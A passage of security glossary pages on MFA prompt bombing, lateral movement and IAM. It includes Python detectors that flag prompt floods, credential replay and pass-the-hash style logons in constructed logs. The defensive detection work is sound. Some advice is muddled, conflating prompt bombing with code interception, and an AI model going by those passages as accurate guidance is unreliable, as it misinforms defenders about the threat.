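            streak[user] = 0
        else:
            streak[user] += 1
    return flagged


def sources_prompting_many_users(log, window=timedelta(minutes=5), min_users=3):
    """Source IPs that triggered prompts for several distinct accounts within
    `window`; returns {src_ip: distinct user count}."""
    per_src = defaultdict(list)
    for ts, e in _parse(log):
        per_src[e["src_ip"]].append((ts, e["user"]))
    flagged = {}
    for src, items in per_src.items():
        for i, (start, _) in enumerate(items):
            users = {u for t, u in items[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[src] = max(flagged.get(src, 0), len(users))
    return flagged


if __name__ == "__main__":
    print("velocity:", prompt_velocity(SAMPLE_MFA_LOG))
    print("approved after denials:", approval_after_denials(SAMPLE_MFA_LOG))
    print("sources fanning out:", sources_prompting_many_users(SAMPLE_MFA_LOG))
```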
#### Inspect VPN and Network Logs

Analyzing virtual private network (VPN) logs and network activity can also reveal MFA prompt bombing. Things to look for include:

- A device accessing the VPN from an unusual location. Cybercriminals often spoof locations to mask their identity.
- A device connecting to the network at an unusual time when the legitimate user is unlikely to log in.
- A device accessing a high number of accounts or sensitive resources within the network in a short period. This could indicate the hackers are "spraying and praying" with stolen credentials.

#### Deploy Additional Identity Security Controls

Organizations should implement additional identity security controls to reduce the risk of MFA prompt bombing, such as:

- Requiring a second authentication factor for risky access like VPN logins or access to sensitive data.
- Using FIDO2 passwordless authentication, which can make MFA prompt bombing much harder.
- Monitoring for login attempts from locations that differ from a user's typical access pattern. Unusual access locations can indicate account takeover.
- Rotating and randomizing MFA passcodes to ensure hackers cannot reuse stolen codes.
- Providing user education on spotting and reporting MFA prompt bombing attempts.

By maintaining vigilance and implementing a strong identity security strategy, organizations can detect and mitigate the threat of MFA prompt bombings. It is essential to implement a proactive security strategy across people, processes, and technology to fight off MFA prompt bombing attacks.

### Preventing MFA Prompt Bombing: Best Practices

#### Implement Multi-Factor Authentication

To prevent MFA prompt bombing, organizations should implement multi-factor authentication (MFA) across all internet-facing resources and user accounts. MFA adds an additional layer of security that requires not only a password but also another method of verification like a security code sent via text message or an authentication app. With MFA enabled, attackers using stolen credentials will not succeed in gaining access unless they also have access to the user’s phone or authentication device.

#### Use MFA Options Resistant to Prompt Bombing

Some MFA options are more susceptible to prompt bombing than others. SMS text messaging and voice calls can be compromised, allowing attackers to intercept authentication codes. Hardware tokens and authentication apps provide a higher level of security. Security keys, like YubiKeys, offer the strongest protection and should be used for administrators and privileged accounts whenever possible.

#### Monitor for MFA Prompt Bombing Attempts

Security teams should monitor user accounts and authentication requests for signs of prompt bombing attempts. Things like an unusually high number of MFA prompts in a short time span, MFA prompts originating from suspicious IP addresses, or reports of SMS or voice phishing messages claiming to be MFA codes can all indicate prompt bombing. Detected attacks should trigger an immediate password reset and review of the user's account activity.

#### Provide MFA Education and Training

Educating users about MFA and prompt bombing helps reduce risk. Training should cover:

- How MFA works and the security benefits it provides.
- The various MFA methods available and their level of protection.
- What a legitimate MFA prompt looks like for each method used and how to identify phishing attempts.
- The importance of never sharing MFA codes or authentication devices with others.
- Procedures to follow if a user receives an unsolicited MFA prompt or suspects their account has been compromised.

With the right controls and user education in place, organizations can reduce the threat of MFA prompt bombing and strengthen their users' overall security hygiene. However, as with any cybersecurity defense, continued vigilance and regular reviews of new threats and mitigation techniques are required.

### Choosing an MFA Solution Resistant to Prompt Bombing

To prevent prompt bombing attacks, organizations should implement an MFA solution that uses dynamically generated one-time passcodes (OTPs) instead of SMS text messages. These solutions generate a new OTP each time a user logs in, so attackers cannot reuse codes to gain unauthorized access.

#### Hardware Tokens

Hardware tokens, such as YubiKeys, generate OTPs that change with each login. Since the codes are generated on-device, attackers cannot intercept them via SMS or voice call. Hardware tokens offer a high level of security but may require an upfront investment to purchase the tokens. They also require users to carry an additional physical device, which some may find inconvenient.

#### Authenticator Apps

Authenticator apps like Google Authenticator, Azure MFA, Silverfort, and Duo generate OTPs on the user's phone without relying on SMS or voice calls. The OTPs change frequently and the apps do not transmit the codes over a network, so they are very difficult for attackers to intercept or reuse. Authenticator apps are a secure, convenient, and low-cost MFA solution for organizations on a budget. However, they still require users to have a device capable of running the mobile app.

#### Biometrics

Biometric authentication, such as fingerprint, face, or iris scanning, offers an MFA solution that is very resistant to prompt bombing and other cyber attacks....

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/lateral-movement/

A tactic used by threat actors to stealthily navigate across compromised systems within a network, escalating privileges and reaching high-value assets while avoiding detection.

Lateral movement refers to the technique used by threat actors to navigate through a compromised network or system, stealthily moving from one host to another.
Unlike traditional attacks that target a single entry point, lateral movement allows attackers to spread their influence, expand their control, and access valuable assets within the network. It is a crucial phase of an APT attack, enabling attackers to maintain persistence and achieve their objectives.

### Why is lateral movement used by attackers?

Attackers utilize the lateral movement technique for several reasons, including establishing persistence, accessing high-value targets, escalating privileges, exfiltrating data, and evading security controls.

- Persistence and Avoiding Detection: Lateral movement offers attackers a means to establish persistence within a compromised network. By moving laterally across systems, attackers can evade detection mechanisms that may be focused on monitoring a specific entry point. This technique allows them to remain undetected for longer periods, maximizing their ability to carry out their malicious activities without triggering alarms or arousing suspicion.
- Access to High-Value Targets: Once an initial entry point is compromised, lateral movement allows attackers to explore the network and identify high-value targets. These targets can include sensitive data repositories, critical infrastructure components, or privileged accounts that hold significant power within the organization. By moving laterally, attackers can incrementally gain access to these valuable assets, increasing their control and potential for further compromise.
- Privilege Escalation and Exploitation: Lateral movement often involves the exploitation of vulnerabilities or weaknesses within systems. As attackers navigate through the network, they actively search for opportunities to escalate their privileges. By leveraging compromised accounts, stolen credentials, or exploiting misconfigurations, attackers can elevate their level of access, enabling them to reach more critical systems, databases, or administrative controls. Privilege escalation through lateral movement enhances their ability to manipulate and exploit the network.
- Data Exfiltration and Intellectual Property Theft: One of the primary motivations for attackers is the exfiltration of valuable data or intellectual property. Lateral movement provides them with the means to locate and extract this sensitive information. By strategically moving within the network, attackers can identify and target repositories containing proprietary information, customer data, trade secrets, or financial records. The ability to move laterally enables them to gradually gain access to these repositories and exfiltrate data without raising alarms.
- Evading Security Controls and Defenses: The lateral movement technique enables attackers to bypass security controls that are often focused on perimeter defense. Once inside a network, they can exploit the inherent trust between interconnected systems to maneuver undetected. By moving laterally, attackers can potentially evade network monitoring, intrusion detection systems, and other security measures that are typically focused on external threats. This evasion increases their chances of remaining undetected and extends the timeframe for carrying out their malicious activities.

### How Lateral Movement Works

Lateral movement involves a series of stages that attackers go through to infiltrate and expand their control within a network. These stages typically include:

- Initial Compromise: Lateral movement begins with the initial compromise, where attackers gain unauthorized access to a network or system. This can occur through various means, such as exploiting vulnerabilities, phishing attacks, or leveraging social engineering techniques.
- Reconnaissance: Once inside the network, attackers conduct reconnaissance to gather critical information about the network's topology, systems, and potential targets.
This phase involves scanning and mapping the network, identifying vulnerable systems, and locating high-value assets.
- Credential Dumping: This involves the extraction or theft of credentials from compromised systems to gain unauthorized access to other systems within a network. Once the attackers have obtained valid credentials, they can reuse them to authenticate and move laterally within the network. By leveraging these stolen credentials, attackers can bypass authentication mechanisms, gain access to additional systems, and escalate their control over the network.
- Privilege Escalation: Attackers aim to escalate their privileges within the compromised network. This involves acquiring higher-level access rights, often by exploiting vulnerabilities, misconfigurations, or stealing credentials. Privilege escalation enables attackers to gain control over more systems and resources.
- Lateral Movement: The core phase of the attack, lateral movement, comes into play once attackers have elevated their privileges. Here, they navigate through the network, moving laterally from one system to another. Attackers leverage compromised accounts, stolen credentials, or exploitable vulnerabilities to access additional hosts and expand their control.
- Persistence and Exploitation: Attackers aim to maintain persistence within the network, ensuring their ongoing access even if initial entry points are discovered and mitigated. They establish backdoors, install persistent malware, or manipulate system configurations to maintain control. This enables them to exploit resources, exfiltrate data, or launch further attacks.

### How does lateral movement compare to other cyber attack techniques?

| Attack Technique | Key Characteristics | Relationship to Lateral Movement |
|---|---|---|
| Phishing Attacks | Social engineering techniques to extract sensitive information | Lateral movement may involve the use of stolen credentials |
| Malware | Malicious software for data theft, disruption, or unauthorized access | Lateral movement may utilize malware for propagation or persistence |
| DoS/DDoS Attacks | Overwhelm target systems with excessive traffic | No direct alignment with lateral movement |
| Man-in-the-Middle Attacks | Intercept and manipulate communication for interception or alteration | Lateral movement may include interception as part of the technique |
| SQL Injection | Exploit web application vulnerabilities for unauthorized access | Lateral movement may leverage compromised credentials or databases |
| Cross-Site Scripting (XSS) | Inject malicious scripts into trusted websites for arbitrary code execution or information theft | No direct alignment with lateral movement |
| Social Engineering | Manipulate individuals for divulging sensitive information or performing actions | Lateral movement may involve social engineering in the initial compromise |
| Password Attacks | Techniques like brute-force or dictionary attacks for password cracking | Lateral movement may leverage compromised or stolen credentials |
| Advanced Persistent Threats (APTs) | Sophisticated, targeted attacks for persistent access and specific objectives | Lateral movement is a critical phase within APTs |
| Zero-day Exploits | Target unknown vulnerabilities before patches are available | Lateral movement may incorporate zero-day exploits as part of its technique |

### Techniques and Methods Used in Lateral Movement

As the sophistication of cyber threats continues to evolve, understanding the techniques and methods used in lateral movement becomes paramount for effective defense strategies.
By comprehending these techniques, organizations can implement proactive security measures, such as robust access controls, vulnerability management, and user awareness training, to mitigate the risks associated with lateral movement and protect their critical assets from cyber intruders. Here are the most common techniques involved in lateral movement attacks:

I. Pass-the-Hash (PtH) Attacks: Pass-the-Hash attacks exploit the way Windows stores user credentials in the form of hashed values. Attackers extract password hashes from compromised systems and use them to authenticate and gain access to other systems within the network. By bypassing the need for plaintext passwords, PtH attacks allow attackers to move laterally without the need for continuous credential theft.

II. Pass-the-Ticket (PtT) Attacks: Pass-the-Ticket attacks leverage Kerberos authentication tickets to move laterally within a network. Attackers acquire and abuse valid tickets obtained from compromised systems or stolen from legitimate users. With these tickets, they can authenticate and access additional systems, bypassing traditional authentication mechanisms.

III. Remote Desktop Protocol (RDP) Hijacking: RDP hijacking involves manipulating or exploiting the Remote Desktop Protocol, which allows users to connect to remote systems. Attackers target systems with RDP enabled, exploit vulnerabilities, or use stolen credentials to gain unauthorized access. Once inside, they can navigate laterally by connecting to other systems or utilizing the compromised host as a launching point for further attacks.

IV. Credential Theft and Reuse: Credential theft and reuse play a significant role in lateral movement. Attackers employ various methods, such as keylogging, phishing, or brute-forcing, to steal valid credentials. Once obtained, these credentials are reused to authenticate and move laterally across the network, potentially escalating privileges and accessing high-value targets.

V. Exploitation of Vulnerabilities: Exploiting vulnerabilities is a common technique used in lateral movement. Attackers target unpatched systems or misconfigurations to gain unauthorized access. Exploiting vulnerabilities allows them to move laterally by compromising additional hosts, leveraging weaknesses in software or network configurations.

VI. Malware Propagation: Malware propagation is another prevalent method employed in lateral movement. Attackers deploy malicious software, such as worms or botnets, within the compromised network. These malware instances propagate from one system to another, aiding the attackers in navigating and expanding control within the network.

### What are some real-world examples showcasing the impact of lateral movement attacks?

Target Data Breach (2013): In one of the most prominent cyber attacks, hackers gained access to Target Corporation's network through a third-party vendor. They then used lateral movement techniques to navigate through the network, escalate privileges, and eventually compromise the point-of-sale (POS) systems. The attackers exfiltrated credit card information of approximately 40 million customers, leading to significant financial losses and reputational damage for Target.

Sony Pictures Entertainment Hack (2014): In this high-profile attack, hackers believed to be linked to North Korea infiltrated Sony Pictures' network. Lateral movement techniques allowed them to move through the network, gaining access to sensitive data, including unreleased movies, executive emails, and employee personal information. The attack disrupted business operations and resulted in the release of confidential data, causing substantial financial and reputational harm.

NotPetya Ransomware Attack (2017): The NotPetya ransomware attack started with the compromise of an accounting software company's update mechanism in Ukraine.
Once inside, the attackers utilized lateral movement techniques to rapidly spread the malware within the organization's network. The malware propagated laterally, encrypting systems and disrupting operations of numerous organizations worldwide. NotPetya caused billions of dollars in damages and highlighted the devastating potential of lateral movement in spreading ransomware.

SolarWinds Supply Chain Attack (2020): The SolarWinds attack involved the compromise of the software supply chain, specifically the Orion IT management platform distributed by SolarWinds. Through a sophisticated supply chain attack, threat actors inserted a malicious update that went undetected for several months. Lateral movement techniques were employed to move laterally within the networks of organizations that used the compromised software. This highly sophisticated attack affected numerous government agencies and private organizations, leading to data breaches, espionage, and long-lasting repercussions.

These real-world examples illustrate the impact of lateral movement attacks on organizations across different sectors. They demonstrate how attackers utilize lateral movement to navigate networks, escalate privileges, access valuable data, and cause significant financial and reputational damage.

### How to detect & prevent lateral movement attacks?

Detecting and preventing lateral movement attacks is crucial for organizations to protect their networks and valuable assets. Here are some effective strategies to detect and prevent lateral movement:

Strong Access Controls and Authentication Mechanisms: Implement multi-factor authentication (MFA) and strong access controls to mitigate the risk of compromised credentials. Enforce strong password policies, regularly rotate passwords, and consider implementing technologies like Privileged Access Management (PAM) to secure privileged accounts and prevent unauthorized lateral movement.
Network Monitoring and Anomaly Detection: Implement robust network monitoring solutions that can detect unusual or suspicious behavior within the network. Utilize Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Security Information and Event Management (SIEM) tools, and behavior analytics to identify anomalies, such as abnormal traffic patterns, unauthorized access attempts, or unusual user behavior.

User and Entity Behavior Analytics (UEBA): Leverage UEBA solutions to monitor user activities and identify deviations from normal behavior. UEBA can detect suspicious lateral movement patterns, such as unusual account usage, privilege escalation attempts, or abnormal access to resources, helping to proactively identify potential attacks.

Segmentation and Network Isolation: Implement network segmentation to divide the network into isolated zones based on security requirements and access privileges. This helps contain lateral movement within specific network segments, limiting the potential impact of an attack and making it harder for attackers to navigate and expand their control.

Least Privilege Principle: Follow the principle of least privilege, ensuring that users and systems have only the necessary access rights and privileges required to perform their tasks. Restricting privileges reduces the potential for lateral movement and limits the scope of an attacker's movement within the network.

Regular Patching and Vulnerability Management: Maintain a robust patch management process to promptly apply security patches and updates to systems, software, and network devices. Regularly scan and assess the network for vulnerabilities, prioritize remediation efforts, and implement security controls to mitigate known vulnerabilities that could be exploited for lateral movement.

Security Awareness and Training: Educate employees and users about the risks of social engineering, phishing attacks, and the importance of secure practices.
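The monitoring and UEBA strategies above become concrete when written as detection logic. The following Python is an added example, not Silverfort's code or any product's analytics: it runs three checks over constructed logon events, a per-account fan-out check (unusual account usage), a per-source pivot check (one endpoint reusing several stolen credentials), and a Kerberos-to-NTLM change check (the pass-the-hash technique described above replays NTLM hashes). The line format, thresholds and sample data are assumptions.

```python
"""Toy lateral-movement detector over constructed Windows-style logon events.
Added example: line format, thresholds and sample data are assumptions, not any
product's schema. Each line summarises one successful logon (Security event 4624)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: routine Kerberos activity, then an evening burst in which
# 'svc-backup' fans out from 10.0.1.50 over NTLM (logon type 3 = network,
# type 10 = RDP) and the same source address also replays 'bob'.
SAMPLE_LOG = """\
2024-05-01T09:00:12Z host=FS-01 user=alice type=3 auth=Kerberos src=10.0.1.7
2024-05-01T09:03:40Z host=FS-01 user=bob type=3 auth=Kerberos src=10.0.1.9
2024-05-01T09:15:02Z host=PRINT-01 user=alice type=3 auth=Kerberos src=10.0.1.7
2024-05-01T13:02:00Z host=FS-02 user=svc-backup type=3 auth=Kerberos src=10.0.2.4
2024-05-01T22:10:05Z host=FS-01 user=svc-backup type=3 auth=NTLM src=10.0.1.50
2024-05-01T22:10:09Z host=FS-02 user=svc-backup type=3 auth=NTLM src=10.0.1.50
2024-05-01T22:10:14Z host=SQL-01 user=svc-backup type=3 auth=NTLM src=10.0.1.50
2024-05-01T22:10:21Z host=SQL-02 user=svc-backup type=3 auth=NTLM src=10.0.1.50
2024-05-01T22:11:03Z host=DC-01 user=svc-backup type=10 auth=NTLM src=10.0.1.50
2024-05-01T22:12:30Z host=APP-01 user=bob type=3 auth=NTLM src=10.0.1.50
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"type=(?P<type>\d+) auth=(?P<auth>\S+) src=(?P<src>\S+)$"
)
REMOTE_LOGON_TYPES = {"3", "10"}  # network (SMB/RPC) and RemoteInteractive (RDP)


def parse_events(text):
    """Parse log lines into dicts with a datetime 'ts'; unmatched lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def _windows(evs, window):
    """Yield each sliding-window slice of evs (already sorted by ts)."""
    start = 0
    for end in range(len(evs)):
        while evs[end]["ts"] - evs[start]["ts"] > window:
            start += 1
        yield evs[start:end + 1]


def _remote_by(events, key):
    """Group remote (network/RDP) logons by the given event field."""
    groups = defaultdict(list)
    for ev in events:
        if ev["type"] in REMOTE_LOGON_TYPES:
            groups[ev[key]].append(ev)
    return groups


def detect_fan_out(events, window=timedelta(minutes=10), max_hosts=3):
    """Accounts reaching more than max_hosts distinct hosts inside one window
    (the 'unusual account usage' UEBA pattern); the widest host set is kept."""
    findings = {}
    for user, evs in _remote_by(events, "user").items():
        for win in _windows(evs, window):
            hosts = {e["host"] for e in win}
            if len(hosts) > max_hosts and len(hosts) > len(findings.get(user, ())):
                findings[user] = sorted(hosts)
    return findings


def detect_pivot_source(events, window=timedelta(minutes=10), min_accounts=2, min_hosts=3):
    """Source addresses driving several accounts against several hosts: one
    endpoint replaying stolen credentials (allowlist legitimate jump hosts)."""
    findings = {}
    for src, evs in _remote_by(events, "src").items():
        for win in _windows(evs, window):
            users = {e["user"] for e in win}
            hosts = {e["host"] for e in win}
            prev = findings.get(src, {}).get("hosts", ())
            if len(users) >= min_accounts and len(hosts) >= min_hosts and len(hosts) > len(prev):
                findings[src] = {"accounts": sorted(users), "hosts": sorted(hosts)}
    return findings


def detect_auth_change(events):
    """Accounts first seen with Kerberos that later log on with NTLM. Pass-the-hash
    replays an NTLM hash, so treat the shift as a lead (NTLM fallback is also legitimate)."""
    baseline, findings = {}, {}
    for ev in events:
        baseline.setdefault(ev["user"], ev["auth"])
        if ev["auth"] == "NTLM" and baseline[ev["user"]] == "Kerberos":
            findings.setdefault(ev["user"], []).append(ev["host"])
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("fan-out:", detect_fan_out(evs))
    print("pivot source:", detect_pivot_source(evs))
    print("auth change:", detect_auth_change(evs))
```

On the sample, only svc-backup and the 10.0.1.50 source trip the checks, while alice's two daytime logons stay under every threshold; real deployments tune the window and thresholds per account type and exclude known jump hosts and scanners.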
Raise awareness about the impact of...

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-and-access-management-iam/

A framework of policies, processes, and technologies for creating, managing, authenticating, and authorizing digital identities to ensure that the right users access the right resources at the right times.

Identity and Access Management (IAM) is a framework of policies, processes, and technologies that enable organizations to manage digital identities and control access to their resources. In simpler terms, IAM is a product category that deals with the creation of user accounts and ongoing management of their resource access, so the right people have access to the right resources at the right time. It involves managing user identities, authenticating users, authorizing access to resources, and enforcing security policies.

IAM has become increasingly important for businesses as they face growing cybersecurity threats and compliance requirements. With more employees working remotely and accessing company data from various devices and locations, it's crucial for organizations to have a centralized system for managing user identities and controlling access to sensitive information. IAM helps businesses reduce the risk of data breaches, improve regulatory compliance, streamline IT operations, and enhance identity security.

IAM works by creating a unique digital identity for each user within an organization's network. This identity includes information such as username, password, role or job title, department or team affiliation, and other attributes that define the user's level of access to different resources. IAM solutions use various authentication methods such as passwords, biometrics, smart cards or tokens to verify users' identities before granting them access to specific applications or data. IAM also provides tools for monitoring user activity and detecting suspicious behavior in real-time.
### Why is IAM important for businesses?

Identity and Access Management (IAM) is a crucial aspect of any business that deals with sensitive data. It ensures that only authorized individuals have access to the information they need to perform their job functions. IAM helps businesses maintain control over their data, reduce the risk of data breaches, and comply with regulatory requirements.

Without proper IAM, businesses are vulnerable to cyber attacks, which can result in significant financial losses and damage to their reputation. Hackers often target organizations that lack strong security measures, making it essential for businesses to implement IAM solutions that provide robust protection against unauthorized access.

IAM also streamlines the process of managing user accounts and permissions. With IAM solutions in place, businesses can automate tasks such as creating new user accounts, assigning roles and permissions, and revoking access when necessary. This not only saves time but also reduces the risk of human error, ensuring that employees have access to the resources they need without compromising security.

### How does IAM work?

Identity and Access Management (IAM) is a framework that enables organizations to manage user identities and their access to resources. IAM works by providing a centralized system for managing user authentication, authorization, and permissions across various applications and systems. This means that users can access the resources they need while ensuring that sensitive data remains secure.

The process of IAM starts with user authentication, which verifies the identity of the user through various methods such as passwords, biometrics, or smart cards. Once the user is authenticated, IAM then determines what level of access they have based on their role within the organization. This includes granting or revoking access to specific applications or data based on predefined policies.
IAM also provides auditing capabilities that allow organizations to track user activity and monitor any suspicious behavior. This helps in identifying potential security threats and taking appropriate action before any damage is done. The general steps for IAM are:

Identity Management: IAM begins with identity management, which involves establishing and managing unique digital identities for individuals or entities within an organization's ecosystem. These identities can be assigned to employees, contractors, partners, or even specific systems and applications. Each identity is associated with a set of attributes and credentials, such as usernames, passwords, and digital certificates.

Authentication: Authentication is the process of verifying the claimed identity of an individual or entity. IAM systems employ various authentication methods to ensure the legitimacy of users before granting access. Common authentication factors include something the user knows (passwords, PINs), something the user possesses (smart cards, hardware tokens), or something the user is (biometrics like fingerprints or facial recognition). Multi-factor authentication (MFA) combines multiple factors for enhanced security.

Authorization: Once a user's identity has been established and authenticated, IAM determines the level of access and permissions that should be granted. This process is known as authorization. Authorization policies define what resources a user can access and what actions they can perform. IAM systems typically provide granular control over permissions, allowing organizations to implement the principle of least privilege (POLP), granting users only the necessary access required to fulfill their roles.

Access Enforcement: IAM systems enforce access controls by acting as intermediaries between users and resources. They validate user credentials and ensure that the requested access aligns with the established authorization policies.
Access enforcement mechanisms may include role-based access control (RBAC), where access rights are assigned based on predefined roles, or attribute-based access control (ABAC), which considers various attributes such as user location, time of access, or device used.

Provisioning and Deprovisioning: IAM systems also handle the provisioning and deprovisioning of user accounts and access privileges. When a new user joins an organization, IAM facilitates the creation of their digital identity and assigns appropriate access rights based on their role. Similarly, when an employee leaves the organization or changes roles, IAM ensures that their access privileges are promptly revoked or modified to prevent unauthorized access.

Identity Governance: Identity governance refers to the ongoing management and oversight of user identities and access rights. IAM solutions offer tools for administrators to monitor and review access permissions, detect anomalies or violations, and implement corrective actions. This helps maintain a secure and compliant environment by aligning access privileges with organizational policies and regulatory requirements.

### Types of IAM solutions available in the market

Identity and Access Management (IAM) is a crucial aspect of any organization's cybersecurity strategy. It helps businesses to manage user identities, access permissions, and authentication processes effectively. There are various types of IAM tools available in the market that cater to different business needs.

On-Premises IAM: On-premises IAM solutions are installed and managed within an organization's own infrastructure. These solutions provide organizations with full control over their IAM infrastructure, customization options, and integration capabilities with legacy systems. On-premises IAM offers organizations the ability to tailor IAM processes to their specific requirements and maintain direct control over security measures and compliance obligations.
Cloud IAM: Cloud IAM solutions are hosted and managed by cloud service providers (CSPs). Organizations leverage IAM services offered by the CSP to handle identity management, authentication, and access control. Cloud IAM provides benefits such as scalability, rapid deployment, cost efficiency, and reduced infrastructure management. Organizations can take advantage of pre-built IAM services and leverage the CSP's expertise in managing security and compliance.

Federated IAM: Federated IAM solutions enable organizations to establish trust relationships between different identity domains. Instead of managing identities and access controls within a single organization, federated IAM allows users to authenticate and access resources across multiple trusted domains. This type of IAM solution is often used in scenarios involving collaboration between organizations or when users need to access resources from various external service providers.

Customer IAM (CIAM): Customer IAM solutions are specifically designed for managing the identities and access of external users, such as customers, partners, or clients. CIAM focuses on providing a seamless and secure user experience for external users by offering features like self-registration, social media login integration, single sign-on (SSO), and consent management. CIAM solutions help organizations establish and maintain strong relationships with their external user base while ensuring data privacy and security.

Privileged Access Management (PAM): Privileged Access Management solutions focus on managing and securing privileged accounts and access rights. Privileged accounts have elevated privileges and are often targeted by malicious actors. PAM solutions help organizations enforce strict controls and policies around privileged access, including privileged account discovery, session monitoring, password vaulting, and just-in-time access.
PAM is crucial for protecting critical systems and sensitive data from insider threats and external attacks.

It's important to note that these types of IAM solutions are not mutually exclusive, and organizations can combine different approaches based on their specific needs. The selection of an appropriate IAM solution depends on factors such as organizational size, complexity, security requirements, compliance obligations, and the nature of users accessing the systems and resources.

### What is the Difference Between Identity Management and Access Management?

While these terms are often used interchangeably, they refer to distinct aspects of IAM. In simpler terms, Identity Management is about establishing and managing digital identities, whereas Access Management is about controlling and regulating the access rights and permissions associated with those identities. IDM is responsible for creating and maintaining identities, while AM focuses on managing and enforcing access controls based on those identities.

| Aspect | Identity Management (IDM) | Access Management (AM) |
|---|---|---|
| Focus | Establishing and managing digital identities | Controlling and managing access permissions |
| Activities | User onboarding, offboarding, identity lifecycle management | Authentication, authorization, access control policies |
| Objective | Creating and maintaining digital identities | Enforcing access controls based on identities |
| Key Components | Unique identities, attributes, credentials | Authentication mechanisms, access control policies |
| Responsibilities | Identity creation and management | Access rights enforcement |
| Examples | User provisioning, identity lifecycle management | Role-based access control (RBAC), authentication mechanisms |
| Relationship | IDM provides the foundation for AM | AM relies on IDM for identity information |

Identity Management focuses on establishing and managing digital identities for individuals or entities within an organization's ecosystem.
It involves creating unique identities and associating them with attributes and credentials such as usernames, passwords, and digital certificates. IDM encompasses activities such as user onboarding, offboarding, and identity lifecycle management. Its primary objective is to ensure that each user or entity has a well-defined and unique digital identity within the organization's IAM system. IDM provides a foundation for access control and establishes the basis for managing user privileges and permissions.

Access Management, on the other hand, is concerned with controlling and managing the access permissions and privileges associated with an individual's or entity's digital identity. AM focuses on enforcing authentication and authorization processes to ensure that users have the appropriate level of access to specific resources or perform certain actions within the system. Authentication verifies the claimed identity of the user, while authorization determines what resources the user can access and what actions they can perform. AM includes activities such as access control policies, role-based access control (RBAC), and enforcing least privilege principles.

To illustrate the relationship between IDM and AM, consider a scenario where a new employee joins an organization. Identity Management would handle the creation of a digital identity for the employee, assigning a unique username and initial set of credentials. Access Management would then come into play by determining the employee's access rights based on their role and responsibilities within the organization. AM would enforce authentication mechanisms and access control policies to ensure that the employee can access the appropriate resources required to perform their job duties while adhering to the principle of least privilege.
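The IAM steps listed earlier (identity management, authorization, access enforcement with RBAC and ABAC, provisioning and deprovisioning) and the new-employee scenario just described can be shown together in code. This is an added Python example, not the page's or any vendor's implementation: a minimal identity store handles the lifecycle, a role table grants actions, and attribute rules on the sensitive resource are checked at enforcement time. Role names, resources, the attribute rules and the employee "dana" are constructed assumptions.

```python
"""Minimal IAM model for the new-employee scenario: Identity Management creates
the identity, Access Management enforces RBAC and then ABAC on every request.
Added example; role names, resources and attribute rules are assumptions."""
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Identity:
    username: str
    roles: set
    department: str
    mfa_enrolled: bool = False
    active: bool = True


class IdentityStore:
    """Identity Management: provisioning, role changes and deprovisioning."""

    def __init__(self):
        self._identities = {}

    def provision(self, username, roles, department, mfa_enrolled=False):
        ident = Identity(username, set(roles), department, mfa_enrolled)
        self._identities[username] = ident
        return ident

    def change_roles(self, username, roles):
        """Role change (e.g. promotion): old rights are replaced, not accumulated."""
        self._identities[username].roles = set(roles)

    def deprovision(self, username):
        """Leaver: the record is kept for audit but can no longer be authorized."""
        self._identities[username].active = False

    def get(self, username):
        return self._identities.get(username)


# RBAC: role -> resource -> permitted actions. Roles are cut narrowly so a user
# holds only what the job needs (least privilege); 'approve' is admin-only.
ROLE_PERMISSIONS = {
    "employee": {"intranet": {"read"}, "hr-portal": {"read"}},
    "finance-analyst": {"ledger": {"read", "write"}},
    "finance-admin": {"ledger": {"read", "write", "approve"}},
}

# ABAC: resource -> (rule name, predicate over identity and request context).
# Context attributes (device posture, time of access, MFA result) are assumed
# to be supplied by the access gateway; only the ledger carries extra rules.
ABAC_RULES = {
    "ledger": [
        ("managed device", lambda i, c: bool(c.get("device_managed"))),
        ("business hours", lambda i, c: 8 <= c["time"].hour < 19),
        ("MFA verified", lambda i, c: i.mfa_enrolled and bool(c.get("mfa_verified"))),
    ],
}


def request_context(hour, device_managed=True, mfa_verified=True):
    """Constructed request attributes for a given hour of 2024-05-01."""
    return {"device_managed": device_managed, "mfa_verified": mfa_verified,
            "time": datetime(2024, 5, 1, hour, 0)}


def authorize(store, username, resource, action, context):
    """Access enforcement: returns (allowed, reason). RBAC decides whether any
    held role grants the action; ABAC then checks the request's attributes."""
    ident = store.get(username)
    if ident is None or not ident.active:
        return False, "unknown or deprovisioned identity"
    granted = set()
    for role in ident.roles:
        granted |= ROLE_PERMISSIONS.get(role, {}).get(resource, set())
    if action not in granted:
        return False, f"roles {sorted(ident.roles)} grant no '{action}' on {resource}"
    for name, rule in ABAC_RULES.get(resource, []):
        if not rule(ident, context):
            return False, f"attribute rule failed: {name}"
    return True, "granted"


def new_employee_store():
    """Constructed scenario: 'dana' joins Finance as an analyst, MFA enrolled."""
    store = IdentityStore()
    store.provision("dana", ["employee", "finance-analyst"], "finance", mfa_enrolled=True)
    return store


if __name__ == "__main__":
    store = new_employee_store()
    ctx = request_context(10)
    print(authorize(store, "dana", "ledger", "write", ctx))    # (True, 'granted')
    print(authorize(store, "dana", "ledger", "approve", ctx))  # denied by RBAC
    print(authorize(store, "dana", "ledger", "write", request_context(10, device_managed=False)))
    store.deprovision("dana")
    print(authorize(store, "dana", "intranet", "read", ctx))   # denied, deprovisioned
```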
### Cloud Versus On-Premises IAM

As organizations evaluate their Identity and Access Management (IAM) options, one important consideration is whether to adopt a cloud-based IAM solution or stick with an on-premises IAM implementation. Both approaches have their merits and considerations.

| Aspect | Cloud IAM | On-Premises IAM |
|---|---|---|
| Scalability and Flexibility | Easily scalable, flexible provisioning | Limited by on-premises infrastructure |
| Rapid Deployment | Quick deployment of pre-built IAM services | Requires infrastructure setup and configuration |
| Cost Efficiency | Pay-as-you-go model, no upfront costs | Upfront costs for infrastructure and licensing |
| Vendor Management | Reliance on CSP for infrastructure management | Full control over infrastructure management |
| Innovation and Updates | Regular updates and new features from CSP | Controlled updates and customization options |
